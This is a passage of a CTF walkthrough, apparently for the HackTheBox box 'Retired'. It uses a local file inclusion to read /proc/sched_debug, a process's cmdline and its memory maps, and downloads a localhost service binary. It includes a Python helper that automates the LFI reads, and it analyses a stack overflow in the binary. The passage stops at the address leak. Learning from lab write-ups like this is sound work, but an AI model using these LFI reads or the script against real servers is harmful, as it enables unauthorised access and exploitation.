
Running Services

Instead of fuzzing every process ID under /proc, we can read /proc/sched_debug, which lists every task the scheduler knows about, grouped per CPU. On this 5.10 kernel the file is world-readable, so the web server's user can read it through the LFI (since Linux 5.13 it lives under debugfs instead, which is root-only by default).

Note that index.php answers with a 302 to default.html but still returns the included file in the response body, so the raw response has to be inspected (or the client must be told not to follow redirects). The output is shown here:

> http://10.10.11.154/index.php?page=/proc/sched_debug

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 11 Jun 2022 13:34:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 26387

Sched Debug Version: v0.11, 5.10.0-11-amd64 #1
ktime : 8328923.855779
sched_clk : 8328949.808512
cpu_clk : 8328910.610283
jiffies : 4296974500
sched_clock_stable() : 1

sysctl_sched
.sysctl_sched_latency : 12.000000
.sysctl_sched_min_granularity : 1.500000
.sysctl_sched_wakeup_granularity : 2.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 16722747
.sysctl_sched_tunable_scaling : 1 (logarithmic)

cpu#0, 2994.374 MHz
.nr_running : 1
.nr_switches : 990600
.nr_uninterruptible : 27
.next_balance : 4296.974497
.curr->pid : 2605
.clock : 8328910.410439
.clock_task : 8328910.410439
.avg_idle : 882220
.max_idle_balance_cost : 500000

cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 71865.895248
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 1
.load : 1048576
.load_avg : 1
.runnable_avg : 1
.util_avg : 0
.util_est_enqueued : 8
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_avg : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0

rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.000000
.rt_runtime : 950.000000

dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0

runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S systemd 1 71837.344269 3721 120 0.000000 2651.158484 0.000000 0 0 /
I rcu_gp 3 13.991018 2 100 0.000000 0.007684 0.000000 0 0 /
I rcu_par_gp 4 15.991501 2 100 0.000000 0.004448 0.000000 0 0 /
I kworker/0:0H 6 726.721624 4 100 0.000000 0.032020 0.000000 0 0 /
I mm_percpu_wq 9 22.747130 2 100 0.000000 0.003767 0.000000 0 0 /
S rcu_tasks_rude_ 10 24.749343 2 120 0.000000 0.003487 0.000000 0 0 /
S rcu_tasks_trace 11 26.750893 2 120 0.000000 0.003485 0.000000 0 0 /
S ksoftirqd/0 12 71797.040167 44805 120 0.000000 768.053857 0.000000 0 0 /
I rcu_sched 13 71859.964718 124724 120 0.000000 1168.216690 0.000000 0 0 /
S migration/0 14 0.000000 2115 0 0.000000 42.679889 0.000000 0 0 /
S cpuhp/0 15 2851.402188 10 120 0.000000 0.218630 0.000000 0 0 /
S kdevtmpfs 23 4442.398563 128 120 0.000000 1.030105 0.000000 0 0 /
I netns 24 60.629177 2 100 0.000000 0.006492 0.000000 0 0 /
S kauditd 25 2809.086522 7 120 0.000000 1.581827 0.000000 0 0 /
S khungtaskd 26 71560.037243 70 120 0.000000 7.996685 0.000000 0 0 /
S oom_reaper 27 78.752269 2 120 0.000000 0.000000 0.000000 0 0 /
I writeback 28 84.752266 2 100 0.000000 0.000000 0.000000 0 0 /
S kcompactd0 29 71844.543537 16268 120 0.000000 279.627256 0.000000 0 0 /
S ksmd 30 96.752260 2 125 0.000000 0.000000 0.000000 0 0 /
S khugepaged 31 71865.895248 1418 139 0.000000 179.472233 0.000000 0 0 /
I kintegrityd 49 405.507229 2 100 0.000000 0.000000 0.000000 0 0 /
I kblockd 50 411.507226 2 100 0.000000 0.000000 0.000000 0 0 /
I edac-poller 52 670.459560 2 100 0.000000 0.029385 0.000000 0 0 /
I kworker/0:1H 54 71837.046051 4133 100 0.000000 91.271981 0.000000 0 0 /
S kswapd0 56 1790.815695 3 120 0.000000 0.042088 0.000000 0 0 /
I kthrotld 57 1595.067502 2 100 0.000000 0.019697 0.000000 0 0 /
S irq/24-pciehp 58 0.000000 2 49 0.000000 0.038592 0.000000 0 0 /
S irq/26-pciehp 60 0.000000 2 49 0.000000 0.055785 0.000000 0 0 /
S irq/28-pciehp 62 0.000000 2 49 0.000000 0.031389 0.000000 0 0 /
S irq/30-pciehp 64 0.000000 2 49 0.000000 0.034485 0.000000 0 0 /
S irq/32-pciehp 66 0.000000 2 49 0.000000 0.035227 0.000000 0 0 /
S irq/34-pciehp 68 0.000000 2 49 0.000000 0.069511 0.000000 0 0 /
S irq/36-pciehp 70 0.000000 2 49 0.000000 0.028994 0.000000 0 0 /
S irq/38-pciehp 72 0.000000 2 49 0.000000 0.030697 0.000000 0 0 /
S irq/40-pciehp 74 0.000000 2 49 0.000000 0.038842 0.000000 0 0 /
S irq/42-pciehp 76 0.000000 2 49 0.000000 0.044073 0.000000 0 0 /
S irq/44-pciehp 78 0.000000 2 49 0.000000 0.035417 0.000000 0 0 /
S irq/46-pciehp 80 0.000000 2 49 0.000000 0.058559 0.000000 0 0 /
S irq/48-pciehp 82 0.000000 2 49 0.000000 0.121949 0.000000 0 0 /
S irq/50-pciehp 84 0.000000 2 49 0.000000 0.051086 0.000000 0 0 /
S irq/52-pciehp 86 0.000000 2 49 0.000000 0.035327 0.000000 0 0 /
S irq/54-pciehp 88 0.000000 2 49 0.000000 0.035377 0.000000 0 0 /
I acpi_thermal_pm 90 1730.533642 2 100 0.000000 0.031820 0.000000 0 0 /
I ipv6_addrconf 92 1736.094615 2 100 0.000000 0.034797 0.000000 0 0 /
I kstrp 101 1783.567528 2 100 0.000000 0.028925 0.000000 0 0 /
I zswap-shrink 104 1837.710474 2 100 0.000000 0.040245 0.000000 0 0 /
I kworker/u5:0 105 1841.735155 2 100 0.000000 0.027782 0.000000 0 0 /
S scsi_eh_2 159 2370.536546 26 120 0.000000 0.424659 0.000000 0 0 /
S scsi_eh_3 161 2370.524342 26 120 0.000000 0.364995 0.000000 0 0 /
S scsi_eh_4 163 2370.506481 26 120 0.000000 0.331993 0.000000 0 0 /
S scsi_eh_6 167 2370.457376 26 120 0.000000 0.282199 0.000000 0 0 /
S scsi_eh_7 169 2370.496880 26 120 0.000000 0.437710 0.000000 0 0 /
S scsi_eh_8 171 2370.548136 26 120 0.000000 0.384480 0.000000 0 0 /
S scsi_eh_9 173 2370.493685 26 120 0.000000 0.396994 0.000000 0 0 /
S scsi_eh_10 175 2370.795409 26 120 0.000000 0.618389 0.000000 0 0 /
S scsi_eh_13 180 2370.558677 26 120 0.000000 0.391695 0.000000 0 0 /
I mpt_poll_0 183 2079.041144 2 100 0.000000 0.011301 0.000000 0 0 /
S scsi_eh_15 185 2381.755074 4 120 0.000000 11.770674 0.000000 0 0 /
I scsi_tmf_14 186 2079.044701 2 100 0.000000 0.020448 0.000000 0 0 /
I scsi_tmf_15 187 2083.040660 2 100 0.000000 0.009488 0.000000 0 0 /
I mpt/0 188 2087.047587 2 100 0.000000 0.016801 0.000000 0 0 /
S scsi_eh_16 189 2370.510919 26 120 0.000000 0.342273 0.000000 0 0 /
I scsi_tmf_16 191 2087.051306 2 100 0.000000 0.006472 0.000000 0 0 /
I scsi_tmf_17 193 2094.086926 2 100 0.000000 0.022543 0.000000 0 0 /
I scsi_tmf_18 195 2104.130808 2 100 0.000000 0.025187 0.000000 0 0 /
I scsi_tmf_19 197 2114.172475 2 100 0.000000 0.022472 0.000000 0 0 /
I scsi_tmf_20 199 2124.208783 2 100 0.000000 0.021270 0.000000 0 0 /
I scsi_tmf_21 201 2134.253755 2 100 0.000000 0.022812 0.000000 0 0 /
I scsi_tmf_22 203 2144.295063 2 100 0.000000 0.023014 0.000000 0 0 /
I scsi_tmf_23 205 2154.337342 2 100 0.000000 0.023073 0.000000 0 0 /
S scsi_eh_24 206 2370.491431 26 120 0.000000 0.333634 0.000000 0 0 /
I scsi_tmf_24 207 2164.377726 2 100 0.000000 0.022462 0.000000 0 0 /
S scsi_eh_25 208 2370.566941 26 120 0.000000 0.373068 0.000000 0 0 /
I scsi_tmf_25 209 2172.415950 2 100 0.000000 0.019797 0.000000 0 0 /
I scsi_tmf_26 211 2182.464633 2 100 0.000000 0.024276 0.000000 0 0 /
I scsi_tmf_27 213 2190.514666 2 100 0.000000 0.032881 0.000000 0 0 /
S scsi_eh_28 214 2370.457306 26 120 0.000000 0.273262 0.000000 0 0 /
I scsi_tmf_28 215 2200.557066 2 100 0.000000 0.022523 0.000000 0 0 /
S scsi_eh_29 216 2370.473096 26 120 0.000000 0.276820 0.000000 0 0 /
S scsi_eh_30 218 2370.457818 26 120 0.000000 0.280758 0.000000 0 0 /
I scsi_tmf_30 219 2211.642071 2 100 0.000000 0.059151 0.000000 0 0 /
I scsi_tmf_31 221 2211.645798 2 100 0.000000 0.008546 0.000000 0 0 /
S scsi_eh_32 252 2380.927228 2 120 0.000000 0.029265 0.000000 0 0 /
I scsi_tmf_32 253 2384.948763 2 100 0.000000 0.023794 0.000000 0 0 /
S jbd2/sda1-8 284 71837.260091 4137 120 0.000000 198.594561 0.000000 0 0 /
I ext4-rsv-conver 285 2497.825649 3 100 0.000000 0.023003 0.000000 0 0 /
I cryptd 403 2859.418337 2 100 0.000000 0.014688 0.000000 0 0 /
S HangDetector 443 71859.944781 8468 120 0.000000 337.418904 0.000000 0 0 /
S gmain 453 18974.180792 146 120 0.000000 1.609474 0.000000 0 0 /
S activate_licens 423 43189.343856 13 120 0.000000 4.588997 0.000000 0 0 /
S cron 424 71837.542301 309 120 0.000000 72.941778 0.000000 0 0 /
S dbus-daemon 426 71837.272244 1819 120 0.000000 438.606934 0.000000 0 0 /
S in:imklog 436 19010.272129 17 120 0.000000 3.132444 0.000000 0 0 /
S systemd-logind 433 71837.162047 1889 120 0.000000 363.640098 0.000000 0 0 /
S php-fpm7.4 567 71859.931656 9365 120 0.000000 534.538266 0.000000 0 0 /
S nginx 574 71860.262147 316551 120 0.000000 37024.521161 0.000000 0 0 /
S nginx 576 69993.750780 300948 120 0.000000 33940.926945 0.000000 0 0 /
S sshd 577 50199.398838 167 120 0.000000 35.134118 0.000000 0 0 /
S chronyd 580 69320.796637 58 120 0.000000 8.720779 0.000000 0 0 /
I kworker/u4:3 1352 71837.298964 2583 120 0.000000 129.186989 0.000000 0 0 /
I kworker/0:0 1946 71859.922900 6198 120 0.000000 152.716244 0.000000 0 0 /
S php-fpm7.4 2603 71797.489080 27397 120 0.000000 1247.112713 0.000000 0 0 /
S php-fpm7.4 2604 71797.325252 25102 120 0.000000 1164.573565 0.000000 0 0 /
>R php-fpm7.4 2605 71859.928220 17669 120 0.000000 851.221761 0.000000 0 0 /
I kworker/0:2 2863 71353.291048 13 120 0.000000 0.142359 0.000000 0 0 /
I kworker/u4:2 2941 71792.387338 124 120 0.000000 7.232428 0.000000 0 0 /
I kworker/0:1 3010 71729.804003 7 120 0.000000 0.049663 0.000000 0 0 /
S cron 3046 71843.640205 2 120 0.000000 5.197869 0.000000 0 0 /
S sleep 3048 71850.497951 1 120 0.000000 0.857749 0.000000 0 0 /

cpu#1, 2994.374 MHz
.nr_running : 0
.nr_switches : 1622727
.nr_uninterruptible : -27
.next_balance : 4296.974501
.curr->pid : 0
.clock : 8328908.728374
.clock_task : 8328908.728374
.avg_idle : 1000000
.max_idle_balance_cost : 500000

cfs_rq[1]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 68991.880211
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : -2874.015037
.nr_spread_over : 0
.nr_running : 0
.load : 0
.load_avg : 3
.runnable_avg : 3
.util_avg : 3
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_avg : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0

rt_rq[1]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.017262
.rt_runtime : 950.000000

dl_rq[1]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0

runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S kthreadd 2 68822.597441 300 120 0.000000 9.763644 0.000000 0 0 /
S cpuhp/1 16 1150.408667 10 120 0.000000 0.145613 0.000000 0 0 /
S migration/1 17 0.000000 2095 0 0.000000 157.674233 0.000000 0 0 /
S ksoftirqd/1 18 68954.951546 46067 120 0.000000 765.112264 0.000000 0 0 /
I kworker/1:0H 20 89.544035 5 100 0.000000 0.045205 0.000000 0 0 /
I blkcg_punt_bio 51 8.957852 2 100 0.000000 0.009017 0.000000 0 0 /
I devfreq_wq 53 14.962215 2 100 0.000000 0.005902 0.000000 0 0 /
S irq/25-pciehp 59 0.000000 3 49 0.000000 0.052429 0.000000 0 0 /
S irq/27-pciehp 61 0.000000 3 49 0.000000 0.051939 0.000000 0 0 /
S irq/29-pciehp 63 0.000000 3 49 0.000000 0.060313 0.000000 0 0 /
S irq/31-pciehp 65 0.000000 3 49 0.000000 0.065972 0.000000 0 0 /
S irq/33-pciehp 67 0.000000 3 49 0.000000 0.053039 0.000000 0 0 /
S irq/35-pciehp 69 0.000000 3 49 0.000000 0.047347 0.000000 0 0 /
S irq/37-pciehp 71 0.000000 3 49 0.000000 0.050257 0.000000 0 0 /
S irq/39-pciehp 73 0.000000 3 49 0.000000 0.056536 0.000000 0 0 /
S irq/41-pciehp 75 0.000000 3 49 0.000000 0.063369 0.000000 0 0 /
S irq/43-pciehp 77 0.000000 3 49 0.000000 0.091153 0.000000 0 0 /
S irq/45-pciehp 79 0.000000 3 49 0.000000 0.061244 0.000000 0 0 /
S irq/47-pciehp 81 0.000000 3 49 0.000000 0.719377 0.000000 0 0 /
S irq/49-pciehp 83 0.000000 3 49 0.000000 0.064271 0.000000 0 0 /
S irq/51-pciehp 85 0.000000 3 49 0.000000 0.065853 0.000000 0 0 /
S irq/53-pciehp 87 0.000000 3 49 0.000000 0.089158 0.000000 0 0 /
S irq/55-pciehp 89 0.000000 3 49 0.000000 0.056649 0.000000 0 0 /
I kworker/1:1H 91 68822.561973 1557 100 0.000000 43.174418 0.000000 0 0 /
I ata_sff 153 342.417492 2 100 0.000000 0.004609 0.000000 0 0 /
S scsi_eh_0 155 494.693874 26 120 0.000000 0.413033 0.000000 0 0 /
I scsi_tmf_0 156 354.659230 2 100 0.000000 0.007374 0.000000 0 0 /
S scsi_eh_1 157 494.762766 26 120 0.000000 0.391347 0.000000 0 0 /
I scsi_tmf_1 158 362.664780 2 100 0.000000 0.006050 0.000000 0 0 /
I scsi_tmf_2 160 370.670725 2 100 0.000000 0.007092 0.000000 0 0 /
I scsi_tmf_3 162 377.676237 2 100 0.000000 0.006121 0.000000 0 0 /
I scsi_tmf_4 164 385.681575 2 100 0.000000 0.006182 0.000000 0 0 /
S scsi_eh_5 165 494.735917 26 120 0.000000 0.354839 0.000000 0 0 /
I scsi_tmf_5 166 393.687488 2 100 0.000000 0.007834 0.000000 0 0 /
I scsi_tmf_6 168 400.673857 2 100 0.000000 0.006463 0.000000 0 0 /
I scsi_tmf_7 170 408.682107 2 100 0.000000 0.006052 0.000000 0 0 /
I scsi_tmf_8 172 416.687228 2 100 0.000000 0.006002 0.000000 0 0 /
I scsi_tmf_9 174 423.692562 2 100 0.000000 0.005900 0.000000 0 0 /
I scsi_tmf_10 176 431.699136 2 100 0.000000 0.009437 0.000000 0 0 /
S scsi_eh_11 177 494.708393 26 120 0.000000 0.420608 0.000000 0 0 /
S scsi_eh_12 178 500.487979 4 120 0.000000 11.446287 0.000000 0 0 /
I scsi_tmf_11 179 436.543532 2 100 0.000000 0.007644 0.000000 0 0 /
I scsi_tmf_12 181 439.544999 2 100 0.000000 0.009950 0.000000 0 0 /
I scsi_tmf_13 182 442.537038 2 100 0.000000 0.007463 0.000000 0 0 /
S scsi_eh_14 184 494.707942 26 120 0.000000 0.327014 0.000000 0 0 /
S scsi_eh_17 192 494.716610 26 120 0.000000 0.481273 0.000000 0 0 /
S scsi_eh_18 194 494.708010 26 120 0.000000 0.365753 0.000000 0 0 /
S scsi_eh_19 196 494.718584 26 120 0.000000 0.422023 0.000000 0 0 /
S scsi_eh_20 198 494.770066 26 120 0.000000 0.411190 0.000000 0 0 /
S scsi_eh_21 200 494.721246 26 120 0.000000 0.372337 0.000000 0 0 /
S scsi_eh_22 202 494.703865 26 120 0.000000 0.341702 0.000000 0 0 /
S scsi_eh_23 204 494.709874 26 120 0.000000 0.338764 0.000000 0 0 /
S scsi_eh_26 210 494.800002 26 120 0.000000 0.395429 0.000000 0 0 /
S scsi_eh_27 212 495.141935 26 120 0.000000 0.732814 0.000000 0 0 /
I scsi_tmf_29 217 479.432993 2 100 0.000000 0.005560 0.000000 0 0 /
S scsi_eh_31 220 494.785747 26 120 0.000000 0.417502 0.000000 0 0 /
S systemd-journal 334 68986.056612 7423 120 0.000000 1202.272768 0.000000 0 0 /
S systemd-udevd 351 68934.220691 758 120 0.000000 121.843371 0.000000 0 0 /
S irq/16-vmwgfx 393 0.000000 34084 49 0.000000 646.621312 0.000000 0 0 /
I ttm_swap 394 1109.666762 2 100 0.000000 0.008416 0.000000 0 0 /
S card0-crtc0 395 0.000000 2 49 0.000000 0.005209 0.000000 0 0 /
S card0-crtc1 396 0.000000 2 49 0.000000 0.003327 0.000000 0 0 /
S card0-crtc2 397 0.000000 2 49 0.000000 0.002734 0.000000 0 0 /
S card0-crtc3 398 0.000000 2 49 0.000000 0.002545 0.000000 0 0 /
S card0-crtc4 399 0.000000 2 49 0.000000 0.002515 0.000000 0 0 /
S card0-crtc5 400 0.000000 2 49 0.000000 0.002585 0.000000 0 0 /
S card0-crtc6 401 0.000000 2 49 0.000000 0.002475 0.000000 0 0 /
S card0-crtc7 402 0.000000 2 49 0.000000 0.002625 0.000000 0 0 /
S VGAuthService 405 3252.579478 118 120 0.000000 26.094153 0.000000 0 0 /
S vmtoolsd 407 68986.736986 96071 120 0.000000 8179.282273 0.000000 0 0 /
S rsyslogd 430 67944.338994 46 120 0.000000 8.070585 0.000000 0 0 /
S in:imuxsock 435 68984.519610 4064 120 0.000000 136.013100 0.000000 0 0 /
S rs:main Q:Reg 437 68984.518317 4088 120 0.000000 128.380770 0.000000 0 0 /
S hwmon1 520 3765.479041 4 120 0.000000 0.022142 0.000000 0 0 /
S agetty 570 14532.873656 7 120 0.000000 4.224591 0.000000 0 0 /
S nginx 573 3939.801184 6 120 0.000000 0.493405 0.000000 0 0 /
S chronyd 579 66948.226665 51 120 0.000000 5.710881 0.000000 0 0 /
I kworker/1:0 1770 68987.291799 118508 120 0.000000 4181.568487 0.000000 0 0 /
I kworker/u4:0 2341 68529.575316 1213 120 0.000000 78.443746 0.000000 0 0 /
I kworker/u4:1 2838 68529.552352 98 120 0.000000 4.049076 0.000000 0 0 /
I kworker/1:1 2936 68822.706657 14 120 0.000000 0.368192 0.000000 0 0 /
I kworker/1:2 3027 68828.561846 3 120 0.000000 0.026731 0.000000 0 0 /
S sh 3047 68991.880211 3 120 0.000000 1.563492 0.000000 0 0 /

Interestingly, there is a task called activate_licens with PID 423. Task names in sched_debug are cut at 15 characters (the kernel's TASK_COMM_LEN limit), so the real name is longer. Let's discover more about it through /proc/423/cmdline.

> http://10.10.11.154/index.php?page=/proc/423/cmdline

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 11 Jun 2022 13:36:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 31

/usr/bin/activate_license1337

We have found the binary behind the service. /proc/<PID>/cmdline separates the argv entries with NUL bytes, which the browser does not render, so the 31-byte body is really argv[0] = /usr/bin/activate_license followed by argv[1] = 1337: the binary is started with 1337 as its only argument. Let's download it using curl.
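To process these two /proc answers without eyeballing a 26 KB dump, here is a small helper added for this write-up (it is not part of the original post or of the box): it fetches a file through the LFI with http.client, which never follows the 302, so the body is the included file; it extracts the task rows from /proc/sched_debug, coping with names that contain spaces and flagging the 15-character truncation that turns activate_license into activate_licens; and it splits /proc/<PID>/cmdline on its NUL separators. The parameter name page, the script path /index.php and the sample rows are taken from the dumps above; the kernel-thread filter is a name heuristic of my own, since sched_debug carries no kernel/user flag.

```python
import http.client
import re
import urllib.parse

# Constructed excerpt of /proc/sched_debug in the whitespace-collapsed form shown above.
# Task names are capped at 15 characters by the kernel (TASK_COMM_LEN is 16 including the
# terminating NUL), which is why activate_license shows up as "activate_licens".
SAMPLE_SCHED_DEBUG = """\
cpu#0, 2994.374 MHz
.nr_running : 1
.curr->pid : 2605

runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S systemd 1 71837.344269 3721 120 0.000000 2651.158484 0.000000 0 0 /
S migration/0 14 0.000000 2115 0 0.000000 42.679889 0.000000 0 0 /
S activate_licens 423 43189.343856 13 120 0.000000 4.588997 0.000000 0 0 /
S rs:main Q:Reg 437 68984.518317 4088 120 0.000000 128.380770 0.000000 0 0 /
S php-fpm7.4 567 71859.931656 9365 120 0.000000 534.538266 0.000000 0 0 /
>R php-fpm7.4 2605 71859.928220 17669 120 0.000000 851.221761 0.000000 0 0 /
"""

# Constructed /proc/423/cmdline as the kernel serves it: argv entries separated by NUL bytes.
# A browser renders the NULs as nothing, which is why the page shows "activate_license1337".
SAMPLE_CMDLINE = b"/usr/bin/activate_license\x001337\x00"

TASK_COMM_MAX = 15  # longest name sched_debug can show; a name this long may be truncated

# One task row: optional ">" marker for the task currently on the CPU, one-letter state,
# a name that may itself contain spaces, then PID, tree-key (vruntime), switches and prio.
TASK_ROW = re.compile(r"^\s*(>?)\s*([A-Z])\s+(.+?)\s+(\d+)\s+(-?\d+\.\d+)\s+(\d+)\s+(\d+)\s")


def parse_sched_debug(text):
    """Return one dict per task row found in the 'runnable tasks' tables."""
    tasks = []
    for line in text.splitlines():
        m = TASK_ROW.match(line)
        if not m:
            continue  # header, separator and per-CPU statistic lines never match
        marker, state, comm, pid, _vruntime, switches, prio = m.groups()
        tasks.append({
            "state": state,
            "comm": comm,
            "pid": int(pid),
            "switches": int(switches),
            "prio": int(prio),
            "running": marker == ">",
            "truncated": len(comm) >= TASK_COMM_MAX,
        })
    return tasks


def userland_candidates(tasks):
    """Drop the obvious kernel threads so user processes stand out. Heuristic only:
    sched_debug has no kernel/user flag, this just filters well-known kthread names."""
    kthread = re.compile(r"^(kworker|ksoftirqd|migration|cpuhp|rcu_|scsi_|irq/|kthreadd|jbd2/)")
    return [t for t in tasks if not kthread.match(t["comm"])]


def parse_cmdline(raw):
    """Split /proc/<pid>/cmdline into argv; the kernel NUL-terminates every entry."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00") if arg]


def lfi_read(host, path, param="page", script="/index.php"):
    """Fetch a file through the LFI. http.client never follows redirects, which matters
    here: the server answers 302 but still puts the file contents in the body, and a
    redirect-following client would hand back default.html instead. (Assumed request layout.)"""
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request("GET", f"{script}?{param}={urllib.parse.quote(path, safe='/')}")
    body = conn.getresponse().read()
    conn.close()
    return body


if __name__ == "__main__":
    for t in userland_candidates(parse_sched_debug(SAMPLE_SCHED_DEBUG)):
        flag = " (name truncated)" if t["truncated"] else ""
        print(f"{t['pid']:>6} {t['state']} {t['comm']}{flag}")
    print(parse_cmdline(SAMPLE_CMDLINE))
    # Against the box: parse_cmdline(lfi_read("10.10.11.154", "/proc/423/cmdline"))
```

Running it against the box is a matter of feeding lfi_read("10.10.11.154", "/proc/sched_debug") into parse_sched_debug; anything flagged as truncated deserves a cmdline lookup, because the visible name is not the real one.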

> curl http://10.10.11.154/index.php?page=/usr/bin/activate_license --output activate_license

Analysing the binary

Time for pwn? Binary exploitation is totally unexpected! Let's start with a basic checksec.

~/Desktop/HTB/retired ❯ checksec activate_license
[*] '/home/wonyk/Desktop/HTB/retired/activate_license'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled

Most protections are enabled: NX rules out running shellcode from the stack, PIE randomises the binary's own addresses and Full RELRO makes the GOT read-only, so overwriting it is out. The one piece of good news is the missing stack canary: a plain stack overflow will not be detected.

Ghidra

Looking into the binary using Ghidra reveals more of its functionalities.

int main(int argc,char **argv)

{
  int iVar1;
  __pid_t _Var2;
  int *piVar3;
  char *pcVar4;
  char clientaddr_s [16];
  sockaddr_in clientaddr;
  socklen_t clientaddrlen;
  sockaddr_in server;
  uint16_t port;
  int clientfd;
  int serverfd;

  if (argc != 2) {
    error("specify port to bind to");
  }
  /* parse argv[1] (1337 on the box) into port using the format string at DAT_00102100 */
  iVar1 = __isoc99_sscanf(argv[1],&DAT_00102100,&port);
  if (iVar1 == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  printf("[+] starting server listening on port %d\n",(ulong)port);
  server.sin_family = 2;                    /* AF_INET */
  server.sin_addr = htonl(0x7f000001);      /* 127.0.0.1: only reachable from the box itself */
  server.sin_port = htons(port);
  serverfd = socket(2,1,6);                 /* AF_INET, SOCK_STREAM, IPPROTO_TCP */
  if (serverfd == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  iVar1 = bind(serverfd,(sockaddr *)&server,0x10);
  if (iVar1 == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  iVar1 = listen(serverfd,100);
  if (iVar1 == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  puts("[+] listening ...");
  while( true ) {
    while( true ) {
      clientfd = accept(serverfd,(sockaddr *)&clientaddr,&clientaddrlen);
      if (clientfd != -1) break;
      fwrite("Error: accepting client\n",1,0x18,stderr);
    }
    inet_ntop(2,&clientaddr.sin_addr,clientaddr_s,0x10);
    printf("[+] accepted client connection from %s:%d\n",clientaddr_s,(ulong)clientaddr.sin_port);
    _Var2 = fork();                         /* one child per client */
    if (_Var2 == 0) break;                  /* child leaves the accept loop */
    __sysv_signal(0x11,(__sighandler_t)0x1); /* signal(SIGCHLD, SIG_IGN): children are reaped automatically */
    close(clientfd);                        /* parent drops its copy of the client socket */
  }
  close(serverfd);
  activate_license(clientfd);               /* child: handle the client's license data */
  /* WARNING: Subroutine does not return */
  exit(0);
}

Exploiting

Luckily, the binary is simple. It listens on 127.0.0.1 only, on the port given as its single argument (1337 on the box), forks a child for every connection and, in activate_license(), saves whatever the client sends into a database file called license.sqlite.

However, while the buffer in activate_license() is only 512 bytes (0x200), the read call does not limit how many bytes it copies into it, so a longer message overflows this stack buffer. Because the parent ignores SIGCHLD and keeps accepting, a crash in one child does not take the listener down, which lets us retry as often as we need.

BOF

In a normal CTF we could exploit it directly by connecting with netcat. Here, however, the service listens only on localhost, so our payload has to be relayed through the upload web interface, and we never see the program's output! How can we leak the addresses needed to bypass ASLR and PIE? And even if we could leak them, we are not handed the target's libc build like in a normal CTF!

Proc to the rescue

After being stuck for some time, a hint on the HTB forum pointed at getting more out of the LFI via /proc. I immediately recalled that GDB reads a process's memory map from /proc/<PID>/maps!

> http://10.10.11.154/index.php?page=/proc/423/maps

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 11 Jun 2022 13:50:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 4593

5583d20bf000-5583d20c0000 r--p 00000000 08:01 2408 /usr/bin/activate_license
5583d20c0000-5583d20c1000 r-xp 00001000 08:01 2408 /usr/bin/activate_license
5583d20c1000-5583d20c2000 r--p 00002000 08:01 2408 /usr/bin/activate_license
5583d20c2000-5583d20c3000 r--p 00002000 08:01 2408 /usr/bin/activate_license
5583d20c3000-5583d20c4000 rw-p 00003000 08:01 2408 /usr/bin/activate_license
5583d3b11000-5583d3b32000 rw-p 00000000 00:00 0 [heap]
7f9ed2882000-7f9ed2884000 rw-p 00000000 00:00 0
7f9ed2884000-7f9ed2885000 r--p 00000000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2885000-7f9ed2887000 r-xp 00001000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2887000-7f9ed2888000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2888000-7f9ed2889000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2889000-7f9ed288a000 rw-p 00004000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed288a000-7f9ed2891000 r--p 00000000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed2891000-7f9ed28a1000 r-xp 00007000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a1000-7f9ed28a6000 r--p 00017000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a6000-7f9ed28a7000 r--p 0001b000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a7000-7f9ed28a8000 rw-p 0001c000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a8000-7f9ed28ac000 rw-p 00000000 00:00 0
